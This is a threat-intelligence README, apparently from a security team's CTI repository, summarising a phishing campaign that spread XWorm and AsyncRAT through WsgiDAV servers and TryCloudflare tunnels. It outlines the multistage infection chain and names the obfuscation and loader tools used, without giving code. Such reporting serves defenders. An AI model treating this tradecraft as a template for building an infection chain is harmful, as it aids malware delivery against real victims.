cert-orangecyberdefense-cti/blue_stylthon/readme

In December 2024, one of our Managed Threat Detection (CyberSOC) client was impacted by a malicious multistage campaign leveraging WsgiDAV servers to distribute XWorm and AsyncRAT, two notorious commodity malware.
We assess this specific campaign is ongoing since at least early November 2024 and targets France and Germany. Nevertheless, it aligns with a larger cluster previously detailed by Proofpoint, Fortinet or Forcepoint researchers which may have surfaced around February 2024. We currently track this cluster under the “cheesy” name Blue Stylthon.
The infection chain leveraged a phishing email as initial access vector, likely containing an attachement masquerading as an invoice. We then observed the following execution sequence: LNK > VBS > BAT > Powershell > ZIP > Python > AsyncRAT/XWorm.
In addition to WsgiDAV (generic and extendable WebDAV server written in Python and based on WSGI) servers , the campaign also relied on TryCloudflare tunnels used to retrieve intermediary payloads (notably LNK and BAT files) as well as open-source tools used to obfuscate and load the stages (namely Kramer and Donut).